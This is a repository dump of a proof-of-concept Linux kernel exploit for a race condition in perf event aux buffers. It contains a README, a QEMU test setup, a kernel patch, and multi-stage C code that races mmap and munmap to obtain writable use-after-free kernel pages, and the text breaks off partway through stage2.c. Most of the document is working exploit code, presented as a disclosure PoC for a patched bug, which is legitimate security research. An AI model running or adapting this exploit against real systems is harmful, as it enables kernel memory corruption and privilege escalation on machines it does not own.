├── Makefile ├── README.md ├── basic_linux_env ├── build.sh ├── bzImage ├── host │ ├── .gitkeep │ └── exploit ├── initramfs ├── mainline.diff └── run_qemu.sh ├── exploit.c ├── exploit.h ├── perf.c ├── perf.h ├── race_util.c ├── race_util.h ├── stage1.c ├── stage2.c ├── stage3.c ├── util.c └── util.h /Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | SOURCE_FILES = exploit.c util.c perf.c stage1.c stage2.c stage3.c race_util.c 4 | OBJ_FILES = $(patsubst %.c,%.o,$(SOURCE_FILES)) 5 | 6 | CFLAGS = -static -pthread 7 | COBJFLAGS = $(CFLAGS) -c 8 | LDFLAGS = 9 | EXEC_NAME = exploit 10 | 11 | %.o: %.c 12 | $(CC) $^ $(COBJFLAGS) -o $@ 13 | 14 | $(EXEC_NAME): $(OBJ_FILES) 15 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ 16 | 17 | run: $(EXEC_NAME) 18 | cp $(EXEC_NAME) ./basic_linux_env/host/exploit 19 | cd ./basic_linux_env && ./run_qemu.sh 20 | 21 | clean: 22 | rm ./*.o 23 | rm $(EXEC_NAME) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## perf event race condition PoC 2 | This repository demonstrates that the race condition found by Ole (@firzen14) in `perf events` reported to the linux kernel security team is exploitable. 3 | The PoC gains **multiple writable pages** of UAF kernel memory when it succeeds. 4 | 5 | The **patch** for the bug can be found [here](https://lkml.org/lkml/2024/9/5/544). 6 | 7 | The accompanying **blog post** can be found [here](https://binarygecko.com/blog). 8 | 9 | ### Notes 10 | This vulnerability is ordinarily only exploitable on real hardware, due to software `PMU`s not supporting `aux` buffers. 11 | But because all major distributions mitigate the page corruption technique used in this PoC, you will either **crash** your system or see a lot of `bad page` entries in `dmesg` if you run it on your machine. 12 | 13 | It is **recommended** to try this in a **virtual machine** with a **modified mainline kernel** that has been patched to enable `aux` buffers for software events. 14 | 15 | ### Quick Start 16 | * have `qemu-system-x86_64` installed. 17 | * `make run` 18 | * press up and run `/mnt/host/exploit` inside the VM. 19 | 20 | ### Structure 21 | The `basic_linux_env` directory contains: 22 | * `bzImage`: a build of a modified `6.9-rc1` kernel, as described in the `mainline.diff` file. You can replace this with your own kernel build. 23 | * `initramfs`: a `busybox` based `initramfs` that mounts the `host` directory and has `/mnt/host/exploit` in the command history. 24 | * `mainline.diff`: contains an example of how `aux` buffers can be enabled for software events. 25 | 26 | The `Makefile` contains a `make run` command that assumes that you have `qemu-system-x86_64` installed. 27 | It will run `qemu` with the `bzImage` kernel and the `initramfs`. 28 | -------------------------------------------------------------------------------- /basic_linux_env/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo "Building initramfs" 3 | cd basic_initfs 4 | ./build.sh 5 | cd .. -------------------------------------------------------------------------------- /basic_linux_env/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/bzImage -------------------------------------------------------------------------------- /basic_linux_env/host/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/host/.gitkeep -------------------------------------------------------------------------------- /basic_linux_env/host/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/host/exploit -------------------------------------------------------------------------------- /basic_linux_env/initramfs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/initramfs -------------------------------------------------------------------------------- /basic_linux_env/mainline.diff: -------------------------------------------------------------------------------- 1 | diff --git a/kernel/events/core.c b/kernel/events/core.c 2 | index 724e6d7e128f..0192d0002d73 100644 3 | --- a/kernel/events/core.c 4 | +++ b/kernel/events/core.c 5 | @@ -10066,11 +10066,32 @@ static int perf_swevent_init(struct perf_event *event) 6 | return 0; 7 | } 8 | 9 | +static void *perf_swevent_setup_aux(struct perf_event *event, void **pages, 10 | + int nr_pages, bool overwrite) 11 | +{ 12 | + void *buf; 13 | + if(event->attr.config == PERF_COUNT_SW_DUMMY) 14 | + return NULL; 15 | + 16 | + buf = kzalloc(sizeof(*buf), GFP_KERNEL); 17 | + if (!buf) 18 | + return NULL; 19 | + 20 | + return buf; 21 | +} 22 | + 23 | +static void perf_swevent_free_aux(void *aux) 24 | +{ 25 | + void *buf = aux; 26 | + kfree(buf); 27 | +} 28 | + 29 | static struct pmu perf_swevent = { 30 | .task_ctx_nr = perf_sw_context, 31 | 32 | .capabilities = PERF_PMU_CAP_NO_NMI, 33 | - 34 | + .setup_aux = perf_swevent_setup_aux, 35 | + .free_aux = perf_swevent_free_aux, 36 | .event_init = perf_swevent_init, 37 | .add = perf_swevent_add, 38 | .del = perf_swevent_del, 39 | -------------------------------------------------------------------------------- /basic_linux_env/run_qemu.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | qemu-system-x86_64 \ 3 | -m 4096\ 4 | -smp 8\ 5 | -kernel bzImage\ 6 | -append 'console=ttyS0'\ 7 | -initrd initramfs\ 8 | -virtfs local,path=./host,mount_tag=host,security_model=passthrough,id=host\ 9 | -nographic\ 10 | -serial mon:stdio 11 | #-gdb tcp::1234 12 | -------------------------------------------------------------------------------- /exploit.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "exploit.h" 18 | 19 | struct exp_sync *global_exp_data = NULL; 20 | 21 | //The child process holds on to all of the broken references 22 | //If the spray fails the child can be orphaned and the parent can exit cleanly 23 | //and just leak some memory without crashing the system 24 | int proc_child() 25 | { 26 | assignToThisCore(1); 27 | stage1_child((void*)(uint64_t)global_exp_data->fd2); 28 | if(!global_exp_data->stage1.success) 29 | { 30 | fprintf(stderr, "[C] First stage failed, bailing\n"); 31 | return -1; 32 | } 33 | global_exp_data->stage2.extra_vma = global_exp_data->stage1.extra_vma; 34 | stage2_child((void*)(uint64_t)global_exp_data->fd2); 35 | if(!global_exp_data->stage2.success) 36 | { 37 | fprintf(stderr, "[C] Second stage failed, bailing\n"); 38 | return -1; 39 | } 40 | global_exp_data->stage3.mapped_start = global_exp_data->stage2.mapped_start; 41 | global_exp_data->stage3.mapped_end = global_exp_data->stage2.mapped_end; 42 | stage3_child(); 43 | return 0; 44 | } 45 | 46 | int proc_parent() 47 | { 48 | unsigned long vma_size = TARGET_RB_SIZE; 49 | void* mapped = mmap(0, vma_size, PROT_READ|PROT_WRITE,MAP_SHARED, global_exp_data->fd1, 0); 50 | if(mapped == MAP_FAILED) 51 | perror_exit("mmap"); 52 | 53 | if(ioctl(global_exp_data->fd2, PERF_EVENT_IOC_SET_OUTPUT, global_exp_data->fd1)<0) 54 | perror_exit("set_output ioctl"); 55 | printf("[+] redirected event2->event1\n"); 56 | 57 | struct perf_event_mmap_page *user_page = mapped; 58 | user_page->aux_offset = TARGET_AUX_OFFSET; 59 | user_page->aux_size = TARGET_AUX_SIZE; 60 | 61 | assignToThisCore(0); 62 | 63 | stage1_parent((void*)(uint64_t)global_exp_data->fd1); 64 | if(!global_exp_data->stage1.success) 65 | { 66 | printf("[P] First stage failed, bailing\n"); 67 | exit(-1); 68 | } 69 | 70 | 71 | user_page->aux_size = TARGET_AUX_UNMAP_SIZE; 72 | stage2_parent((void*)(uint64_t)global_exp_data->fd1); 73 | if(!global_exp_data->stage2.success) 74 | { 75 | printf("[P] Second stage failed, bailing\n"); 76 | exit(-1); 77 | } 78 | 79 | stage3_parent(); 80 | 81 | 82 | printf("[P] Found %d writable page(s) in %d iterations\n", global_exp_data->stage3.writable_page_count, global_exp_data->stage3.num_iterations); 83 | 84 | //Clear up the sprayed pages we didn't find first 85 | //So that when we cause the UAF of the pages we DID find 86 | //they will be the most recently freed ones 87 | for(int i=0; istage3, NULL, i)) 90 | { 91 | munmap((void*)global_exp_data->stage3.spray_infos[i].map, STAGE3_MMAP_SIZE); 92 | close(global_exp_data->stage3.spray_infos[i].fd); 93 | global_exp_data->stage3.spray_infos[i].fd = -1; 94 | } 95 | } 96 | 97 | //If we didn't find any writable pages we exit the parent and we keep the child process 98 | //alive, so that we don't crash the kernel 99 | if(!global_exp_data->stage3.writable_page_count) 100 | { 101 | fprintf(stderr, "Couldn't find any writable pages. Will leave child process alive to avoid system instability\n"); 102 | exit(0); 103 | } 104 | 105 | printf("[P] Doing refcount manipulation\n"); 106 | for(int i=0; istage3.writable_page_count; i++) 107 | { 108 | //Unmap page from vma, but keep vma alive 109 | int idx = global_exp_data->stage3.writable_pages[i].page_index; 110 | madvise((void*)global_exp_data->stage3.spray_infos[idx].map,PAGE_SIZE, MADV_DONTNEED); 111 | void* new_map = (void*)global_exp_data->stage3.spray_infos[idx].map; 112 | 113 | if(new_map==MAP_FAILED) 114 | { 115 | perror_exit("mmap writable rb"); 116 | } 117 | global_exp_data->stage3.writable_pages[i].writable_page=new_map; 118 | } 119 | 120 | /************************************************************************************************************************************ 121 | * THIS IS THE END OF THE WRITEUP 122 | * ================================================================================================================================== 123 | * The rest of the PoC just does some trivial spraying and scanning of the pages we found to demonstrate that pages are indeed reused 124 | ***********************************************************************************************************************************/ 125 | printf("[P] Checking for change and spraying\n"); 126 | int done = 0; 127 | int spray_fds2[100][2] = {0}; 128 | while(!done) 129 | { 130 | //Spraying some kernel structures so that we can see if the kernel reuses them 131 | for(int i=0; i<100; i++) 132 | pipe(spray_fds2[i]); 133 | 134 | for(int i=0; istage3.writable_page_count; i++) 135 | { 136 | char* curr = (char*)global_exp_data->stage3.writable_pages[i].writable_page; 137 | int idx = global_exp_data->stage3.writable_pages[i].page_index; 138 | for(char* s=curr; s(1ULL<<63)) 142 | { 143 | printf("[P] Writable page changed\n"); 144 | //Adjust this if you want to print more or less 145 | hexdump(curr, PAGE_SIZE/4); 146 | done=1; 147 | break; 148 | } 149 | } 150 | if(done) 151 | break; 152 | } 153 | for(int i=0; i<100; i++) 154 | if(spray_fds2[i][0]>=0) 155 | { 156 | close(spray_fds2[i][0]); 157 | close(spray_fds2[i][1]); 158 | } 159 | } 160 | 161 | printf("[P] Main thread done\n"); 162 | printf("[P] Spinning\n"); 163 | while(1){} 164 | } 165 | 166 | int shared_setup(int perf_fd, int perf_fd2) 167 | { 168 | global_exp_data = mmap(0,sizeof(*global_exp_data), PROT_READ|PROT_WRITE,MAP_ANON|MAP_SHARED,-1,0); 169 | if(global_exp_data==MAP_FAILED) 170 | perror_exit("exp_data mmap"); 171 | 172 | memset(global_exp_data,0, sizeof(*global_exp_data)); 173 | global_exp_data->fd1 = perf_fd; 174 | global_exp_data->fd2 = perf_fd2; 175 | global_exp_data->stage1.usec_delay = RACE_DELAY_AVG; 176 | global_exp_data->stage1.usec_delay_max = RACE_DELAY_AVG+RACE_DELAY_RANGE; 177 | global_exp_data->stage1.usec_delay_min = RACE_DELAY_AVG-RACE_DELAY_RANGE; 178 | race_barrier_init(&global_exp_data->stage1.rdy_barrier, NUM_RACERS); 179 | race_barrier_init(&global_exp_data->stage1.result_barrier, NUM_RACERS); 180 | race_barrier_init(&global_exp_data->stage2.rdy_barrier, NUM_RACERS); 181 | race_barrier_init(&global_exp_data->stage2.result_barrier, NUM_RACERS); 182 | race_barrier_init(&global_exp_data->stage3.rdy_barrier, NUM_RACERS); 183 | race_barrier_init(&global_exp_data->stage3.spray_barrier, NUM_RACERS); 184 | race_barrier_init(&global_exp_data->stage3.change_barrier, NUM_RACERS); 185 | race_barrier_init(&global_exp_data->stage3.check_barrier, NUM_RACERS); 186 | race_barrier_init(&global_exp_data->stage3.result_barrier, NUM_RACERS); 187 | } 188 | 189 | 190 | int main(int argc, char* argv[]) 191 | { 192 | printf("[+] Opening event fd\n"); 193 | int perf_fd = get_aux_mappable_fd(); 194 | if(perf_fd<0) 195 | { 196 | printf("[-] Couldn't find aux mappable event_pmu\n"); 197 | exit(-1); 198 | } 199 | //Second event fd doesn't need to be aux mappable at all, in fact it shouldn't be for the oracle to work 200 | //So just open the software dummy event 201 | struct perf_event_attr attrs = {0}; 202 | memset((char*)&attrs,0,sizeof(attrs)); 203 | attrs.size = sizeof(attrs); 204 | attrs.disabled = 1; 205 | attrs.exclude_kernel = 1; 206 | attrs.exclude_hv = 1; 207 | attrs.type = PERF_TYPE_SOFTWARE; 208 | attrs.config = PERF_COUNT_SW_DUMMY; 209 | int perf_fd2 = perf_event_open(&attrs,0,-1,-1,0); 210 | if(perf_fd2<0) 211 | { 212 | printf("[-] ret=%d\n",perf_fd2); 213 | perror_exit("[-] perf_event_open 2"); 214 | } 215 | printf("[+] Opened event fds\n"); 216 | 217 | shared_setup(perf_fd, perf_fd2); 218 | 219 | if(fork()==0) 220 | { 221 | if(proc_child()) 222 | { 223 | exit(-1); 224 | } 225 | printf("[C] Spinning\n"); 226 | while(1){ 227 | sleep(60); 228 | } 229 | exit(0); 230 | } 231 | else 232 | { 233 | if(proc_parent()) 234 | { 235 | exit(-1); 236 | } 237 | } 238 | } 239 | -------------------------------------------------------------------------------- /exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef __EXPLOIT_H__ 2 | #define __EXPLOIT_H__ 3 | #define _GNU_SOURCE 4 | #include 5 | #include 6 | #include "util.h" 7 | #include "perf.h" 8 | #include "race_util.h" 9 | //Exploit configuration 10 | #define NUM_RACERS 2 11 | #define TARGET_AUX_OFFSET TEST_AUX_OFFSET 12 | #define TARGET_AUX_SIZE 0x8000000 13 | #define TARGET_RB_SIZE 0x1000 14 | 15 | #define PAGE_SIZE 4096 16 | 17 | #define RACE_MAX_FOUND_OFFSET 5 18 | 19 | #define RACE_DELAY_AVG 0 20 | #define RACE_DELAY_RANGE 200 21 | #define RACE_ACCESS_PAGE_DELAY 100000 22 | 23 | #define TARGET_AUX_UNMAP_SIZE 0x8000000 24 | 25 | #define RACE2_STEP_SIZE 100 26 | #define RACE2_CATCH_SIZE 0x1000 27 | #define RACE2_SAFETY_BUFFER_SIZE 0x8000 28 | 29 | #define STAGE3_VAL1 ((char)(unsigned char)0x7f) 30 | #define STAGE3_MMAP_SIZE PAGE_SIZE 31 | //How many pages or what fraction are we trying to find 32 | #define STAGE3_ABS_THRESHOLD 64 33 | #define STAGE3_MAX_ITERATIONS 100 34 | #define STAGE3_MIN_ITERATIONS 20 35 | 36 | #define SPRAY_NUM 100 37 | 38 | //Bookkeeping for exploit stages and synchronization for IPC 39 | struct exp_sync_stage1 40 | { 41 | struct race_barrier rdy_barrier; 42 | struct race_barrier result_barrier; 43 | volatile int mapped; 44 | volatile int race_mapped; 45 | volatile int redirected; 46 | volatile int caught_sigbus; 47 | volatile int usec_delay; 48 | volatile int usec_delay_min; 49 | volatile int usec_delay_max; 50 | volatile int race_done; 51 | volatile int race_counter; 52 | volatile int success; 53 | volatile void* extra_vma; 54 | }; 55 | 56 | struct exp_sync_stage2 57 | { 58 | struct race_barrier rdy_barrier; 59 | struct race_barrier result_barrier; 60 | 61 | volatile void* extra_vma; 62 | volatile int success; 63 | volatile int race_done; 64 | volatile void* faulted; 65 | volatile void* mapped_start; 66 | volatile void* mapped_end; 67 | volatile int caught_sigbus; 68 | 69 | volatile int mapped; 70 | 71 | volatile int usec_delay; 72 | volatile int usec_delay_min; 73 | volatile int usec_delay_max; 74 | }; 75 | 76 | struct writable_page_info 77 | { 78 | volatile int page_index; 79 | volatile void* writable_page; 80 | }; 81 | 82 | struct spray_map_info 83 | { 84 | volatile int fd; 85 | volatile void* map; 86 | }; 87 | 88 | struct exp_sync_stage3 89 | { 90 | volatile void* mapped_start; 91 | volatile void* mapped_end; 92 | 93 | struct race_barrier rdy_barrier; 94 | struct race_barrier spray_barrier; 95 | struct race_barrier change_barrier; 96 | struct race_barrier check_barrier; 97 | struct race_barrier result_barrier; 98 | 99 | volatile int spraying; 100 | volatile int spray_done; 101 | volatile int scanning; 102 | volatile int scan_done; 103 | volatile int req_change; 104 | volatile int change_done; 105 | volatile int finished; 106 | 107 | volatile int total_page_count; 108 | 109 | volatile int num_iterations; 110 | struct writable_page_info writable_pages[STAGE3_ABS_THRESHOLD]; 111 | 112 | volatile int writable_page_count; 113 | struct spray_map_info spray_infos[SPRAY_NUM]; 114 | }; 115 | 116 | struct exp_sync 117 | { 118 | int fd1; 119 | int fd2; 120 | struct exp_sync_stage1 stage1; 121 | struct exp_sync_stage2 stage2; 122 | struct exp_sync_stage3 stage3; 123 | }; 124 | extern struct exp_sync *global_exp_data; 125 | void* stage1_parent(void* args); 126 | void* stage1_child(void* args); 127 | void* stage2_parent(void* args); 128 | void* stage2_child(void* args); 129 | void stage3_parent(); 130 | void stage3_child(); 131 | int page_already_found(struct exp_sync_stage3 *exp_data, void* addr, int idx); 132 | #endif -------------------------------------------------------------------------------- /perf.c: -------------------------------------------------------------------------------- 1 | #include "perf.h" 2 | #include 3 | #include 4 | 5 | //wrapper since glibc doesn't provide it themselves 6 | int perf_event_open(struct perf_event_attr* attr, pid_t pid, int cpu, int group_fd, unsigned long flags) 7 | { 8 | return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags); 9 | } 10 | 11 | //helper function that searches for an aux mappable PMU 12 | int get_aux_mappable_fd() 13 | { 14 | for(int t = 0; taux_offset = TEST_AUX_OFFSET; 39 | user_page->aux_size = 0x1000; 40 | void* aux_mapped = mmap(0, 0x1000, PROT_READ, MAP_SHARED, perf_fd, TEST_AUX_OFFSET); 41 | if(aux_mapped != MAP_FAILED) 42 | { 43 | printf("[+] Found aux mappable pmu: t=%d, c=%d\n", t, c); 44 | //Close additional mappings and original event fd 45 | //and return new fd of same type and config 46 | munmap(mapped, 0x1000); 47 | munmap(aux_mapped, 0x1000); 48 | close(perf_fd); 49 | return perf_event_open(&attrs,0,-1,-1,0);; 50 | } 51 | munmap(mapped, 0x1000); 52 | close(perf_fd); 53 | } 54 | } 55 | return -1; 56 | } -------------------------------------------------------------------------------- /perf.h: -------------------------------------------------------------------------------- 1 | #ifndef __PERF_H__ 2 | #define __PERF_H__ 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #define MAX_ENUM_TYPE 20 9 | #define MAX_ENUM_CONFIG 20 10 | #define TEST_AUX_OFFSET 0x2000 11 | 12 | int perf_event_open(struct perf_event_attr* attr, pid_t pid, int cpu, int group_fd, unsigned long flags); 13 | int get_aux_mappable_fd(); 14 | #endif -------------------------------------------------------------------------------- /race_util.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include "race_util.h" 3 | #include 4 | #include 5 | #include 6 | int race_barrier_init(struct race_barrier* barrier, int total_waiters) 7 | { 8 | memset(barrier, 0, sizeof(*barrier)); 9 | pthread_barrierattr_t attr = {0}; 10 | pthread_barrierattr_init(&attr); 11 | pthread_barrierattr_setpshared(&attr, 1); 12 | pthread_barrier_init(&barrier->barrier,&attr,total_waiters); 13 | return 0; 14 | } 15 | 16 | int race_barrier_wait_or_abort(struct race_barrier* barrier, volatile int* abort_mem) 17 | { 18 | return pthread_barrier_wait(&barrier->barrier); 19 | } 20 | 21 | int race_signal_set(race_signal_t* signal) 22 | { 23 | if(*signal==SIGNAL_STATE_SET) 24 | return -1; 25 | *signal = SIGNAL_STATE_SET; 26 | return 0; 27 | } 28 | 29 | int race_signal_set_and_wait(race_signal_t* signal) 30 | { 31 | if(*signal==SIGNAL_STATE_SET) 32 | return -1; 33 | *signal = SIGNAL_STATE_SET; 34 | //Wait for signal to be consumed 35 | while(*signal != SIGNAL_STATE_CONSUMED) 36 | sched_yield(); 37 | *signal = SIGNAL_STATE_UNSET; 38 | return 0; 39 | } 40 | 41 | int race_signal_isset(race_signal_t* signal) 42 | { 43 | return *signal == SIGNAL_STATE_SET; 44 | } 45 | 46 | int race_signal_consume(race_signal_t* signal) 47 | { 48 | if(*signal!=SIGNAL_STATE_SET) 49 | return -1; 50 | *signal = SIGNAL_STATE_CONSUMED; 51 | } -------------------------------------------------------------------------------- /race_util.h: -------------------------------------------------------------------------------- 1 | #ifndef __RACE_UTIL_H__ 2 | #define __RACE_UTIL_H__ 3 | #include 4 | #define RACE_PARENT 0 5 | #define RACE_CHILD 1 6 | struct race_barrier 7 | { 8 | pthread_barrier_t barrier; 9 | volatile int total_waiters; 10 | volatile int num_waiting; 11 | volatile int num_ready; 12 | volatile int num_running; 13 | }; 14 | 15 | int race_barrier_init(struct race_barrier* barrier, int total_waiters); 16 | int race_barrier_wait_or_abort(struct race_barrier* barrier, volatile int* abort_mem); 17 | #define race_barrier_wait(__barrier) race_barrier_wait_or_abort(__barrier, NULL) 18 | 19 | #define SIGNAL_STATE_UNSET 0 20 | #define SIGNAL_STATE_SET 1 21 | #define SIGNAL_STATE_CONSUMED 2 22 | typedef volatile int race_signal_t; 23 | 24 | int race_signal_set(race_signal_t* signal); 25 | int race_signal_set_and_wait(race_signal_t* signal); 26 | int race_signal_isset(race_signal_t* signal); 27 | int race_signal_consume(race_signal_t* signal); 28 | #endif -------------------------------------------------------------------------------- /stage1.c: -------------------------------------------------------------------------------- 1 | #include "exploit.h" 2 | #include 3 | #include 4 | #include 5 | 6 | /* Stage 1 7 | * This exploit stage performs a race between the unmapping of an aux buffer and the taking of a refcount to the aux buffer in 8 | * perf_mmap. 9 | * If the race is won an additional vma with the correct pgoff will exist without the aux_mmap_count being affected. 10 | * This will allow arbitrarily freeing the aux buffer while still holding a vma that will try to access aux pages 11 | */ 12 | 13 | static void sigbus_handler(int signum, siginfo_t* si, void* arg) 14 | { 15 | if(signum == SIGBUS) 16 | { 17 | ucontext_t *ctx = (ucontext_t*)arg; 18 | global_exp_data->stage1.caught_sigbus = 1; 19 | //Skip size of the assembly load operation, so that we don't get stuck in an infinite loop of handling sigbus 20 | ctx->uc_mcontext.gregs[REG_RIP]+=3; 21 | } 22 | } 23 | 24 | void* stage1_parent(void* args) 25 | { 26 | int perf_fd = (int)(uint64_t)args; 27 | struct exp_sync_stage1 *exp_data = &global_exp_data->stage1; 28 | printf("[P] Started\n"); 29 | while(!exp_data->race_done) 30 | { 31 | race_barrier_wait(&exp_data->rdy_barrier); 32 | void* mmap_aux = mmap(0, TARGET_AUX_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED, perf_fd, TARGET_AUX_OFFSET); 33 | if(mmap_aux==MAP_FAILED) 34 | { 35 | perror("[P] mmap\n"); 36 | printf("[P] mmap err\n"); 37 | exp_data->mapped = 1; 38 | race_barrier_wait(&exp_data->result_barrier); 39 | continue; 40 | } 41 | exp_data->mapped = 1; 42 | if(exp_data->usec_delay<0) 43 | usleep(-exp_data->usec_delay); 44 | else 45 | usleep(0); 46 | munmap(mmap_aux, TARGET_AUX_SIZE); 47 | race_barrier_wait(&exp_data->result_barrier); 48 | } 49 | return NULL; 50 | } 51 | 52 | void* stage1_child(void* args) 53 | { 54 | struct sigaction sa; 55 | memset(&sa,0, sizeof(sa)); 56 | sigemptyset(&sa.sa_mask); 57 | sa.sa_sigaction = sigbus_handler; 58 | sa.sa_flags = SA_SIGINFO; 59 | sigaction(SIGBUS,&sa, NULL); 60 | int perf_fd2 = (int)(uint64_t)args; 61 | struct exp_sync_stage1 *exp_data = &global_exp_data->stage1; 62 | printf("[C] Started\n"); 63 | while(!exp_data->race_done) 64 | { 65 | if(exp_data->usec_delay_max<=exp_data->usec_delay_min+1 && exp_data->race_counter++ == RACE_MAX_FOUND_OFFSET) 66 | { 67 | exp_data->race_done = 1; 68 | return NULL; 69 | } 70 | race_barrier_wait(&exp_data->rdy_barrier); 71 | while(!exp_data->mapped) 72 | ;//Busy 73 | exp_data->mapped = 0; 74 | if(exp_data->usec_delay>0) 75 | usleep(exp_data->usec_delay); 76 | else 77 | usleep(0); 78 | 79 | void* mmap_aux2 = mmap(0, TARGET_AUX_SIZE, PROT_READ,MAP_SHARED, perf_fd2, TARGET_AUX_OFFSET); 80 | if(mmap_aux2==MAP_FAILED) 81 | { 82 | //Too late, adjust delay 83 | //ENOMEM should only happen in the vm patched kernel instead of ENOTSUP 84 | if(errno==ENOTSUP || errno==EINVAL || errno==ENOMEM) 85 | { 86 | exp_data->usec_delay_max = exp_data->usec_delay; 87 | exp_data->usec_delay = (exp_data->usec_delay_min+exp_data->usec_delay_max)/2; 88 | } 89 | else 90 | { 91 | printf("[C] Unexpected behaviour\n"); 92 | exp_data->race_done = 1; 93 | race_barrier_wait(&exp_data->result_barrier); 94 | return NULL; 95 | } 96 | race_barrier_wait(&exp_data->result_barrier); 97 | continue; 98 | } 99 | usleep(RACE_ACCESS_PAGE_DELAY); 100 | char test = *(volatile char*)mmap_aux2; 101 | if(!exp_data->caught_sigbus) 102 | { 103 | //Too early, we incremented refcount before free started 104 | exp_data->usec_delay_min = exp_data->usec_delay; 105 | exp_data->usec_delay = (exp_data->usec_delay_min+exp_data->usec_delay_max)/2; 106 | munmap(mmap_aux2, TARGET_AUX_SIZE); 107 | //After munmap our rb will be unset because our events mmap count goes to zero 108 | if(ioctl(global_exp_data->fd2, PERF_EVENT_IOC_SET_OUTPUT, global_exp_data->fd1)<0) 109 | perror_exit("set_output ioctl"); 110 | race_barrier_wait(&exp_data->result_barrier); 111 | continue; 112 | } 113 | if(exp_data->caught_sigbus) 114 | { 115 | printf("[C] Won stage 1 race\n"); 116 | //Won the race 117 | exp_data->race_done = 1; 118 | exp_data->success = 1; 119 | exp_data->extra_vma = mmap_aux2; 120 | race_barrier_wait(&exp_data->result_barrier); 121 | return NULL; 122 | } 123 | race_barrier_wait(&exp_data->result_barrier); 124 | } 125 | } -------------------------------------------------------------------------------- /stage2.c: -------------------------------------------------------------------------------- 1 | #include "exploit.h" 2 | #include 3 | #include 4 | 5 | /* Stage 2 6 | * This exploit stage performs a race between the unmapping of an aux buffer and the page fault handler accessing the 7 | * array of pages. 8 | * If the race is won a range of pages that have been returned to the page allocator are going to be mapped in user space. 9 | * This mapping is read only, but it allows freeing a page from an unexpected vma. 10 | */ 11 | 12 | static void sigbus_handler(int signum, siginfo_t* si, void* arg) 13 | { 14 | if(signum == SIGBUS) 15 | { 16 | ucontext_t *ctx = (ucontext_t*)arg; 17 | global_exp_data->stage2.caught_sigbus = 1; 18 | ctx->uc_mcontext.gregs[REG_RIP]+=3; //Skip size of the assembly load operation 19 | } 20 | } 21 | 22 | void* stage2_parent(void* args) 23 | { 24 | struct exp_sync_stage2 *exp_data = &global_exp_data->stage2; 25 | exp_data->mapped = 0; 26 | int perf_fd = (int)(uint64_t)args; 27 | printf("[P] Unmap Started\n"); 28 | while(!exp_data->race_done) 29 | { 30 | race_barrier_wait(&exp_data->rdy_barrier); 31 | void* mmap_aux = mmap(0, TARGET_AUX_UNMAP_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED, perf_fd, TARGET_AUX_OFFSET); 32 | if(mmap_aux==MAP_FAILED) 33 | { 34 | perror("[P] mmap\n"); 35 | printf("[P] mmap err\n"); 36 | exp_data->mapped = 1; 37 | race_barrier_wait(&exp_data->result_barrier); 38 | continue; 39 | } 40 | exp_data->mapped = 1; 41 | if(exp_data->usec_delay<0) 42 | usleep(-exp_data->usec_delay); 43 | else 44 | usleep(0); 45 | munmap(mmap_aux, TARGET_AUX_UNMAP_SIZE); 46 | exp_data->mapped = 0; 47 | race_barrier_wait(&exp_data->result_barrier); 48 | } 49 | return NULL; 50 | } 51 | 52 | void* stage2_child(void* args) 53 | { 54 | struct sigaction sa; 55 | memset(&sa,0, sizeof(sa)); 56 | sigemptyset(&sa.sa_mask); 57 | sa.sa_sigaction = sigbus_handler; 58 | sa.sa_flags = SA_SIGINFO; 59 | sigaction(SIGBUS,&sa, NULL); 60 | 61 | struct exp_sync_stage2 *exp_data = &global_exp_data->stage2; 62 | int perf_fd2 = (int)(uint64_t)args; 63 | exp_data->caught_sigbus = 0; 64 | exp_data->usec_delay = RACE_DELAY_AVG; 65 | printf("[C] Unmap Fault Started\n"); 66 | while(!exp_data->race_done) 67 | { 68 | race_barrier_wait(&exp_data->rdy_barrier); 69 | while(!exp_data->mapped) 70 | ;//Busy 71 | exp_data->mapped = 0; 72 | if(exp_data->usec_delay>0) 73 | usleep(exp_data->usec_delay); 74 | else 75 | usleep(0); 76 | 77 | void* mmap_aux2 = (void*)exp_data->extra_vma; 78 | //Target aux size is smaller than unmap size 79 | void* mmap_aux_end = mmap_aux2+TARGET_AUX_SIZE-PAGE_SIZE; 80 | void* mmap_aux_curr = mmap_aux_end; 81 | 82 | mmap_aux2 += RACE2_SAFETY_BUFFER_SIZE; 83 | //Search backwards from last backed page forward 84 | for(;mmap_aux_curr>=mmap_aux2; mmap_aux_curr-=PAGE_SIZE) 85 | { 86 | char test = *(volatile char*)mmap_aux_curr; 87 | if(exp_data->caught_sigbus) 88 | { 89 | break; 90 | } 91 | } 92 | //If we immediately caught sigbus, we are too late 93 | if(exp_data->caught_sigbus && mmap_aux_curr==mmap_aux_end) 94 | { 95 | //Lost, reset the sigbus flag and adjust offset 96 | exp_data->caught_sigbus = 0; 97 | exp_data->usec_delay-=RACE2_STEP_SIZE; 98 | 99 | if(exp_data->usec_delay<=exp_data->usec_delay_min-1) 100 | { 101 | exp_data->race_done = 1; 102 | race_barrier_wait(&exp_data->result_barrier); 103 | return NULL; 104 | } 105 | race_barrier_wait(&exp_data->result_barrier); 106 | continue; 107 | } 108 | //We accessed at least some pages 109 | //Since we are gradually decreasing the delay assume we are never 110 | //too early by so much that we would have grabbed all pages 111 | 112 | 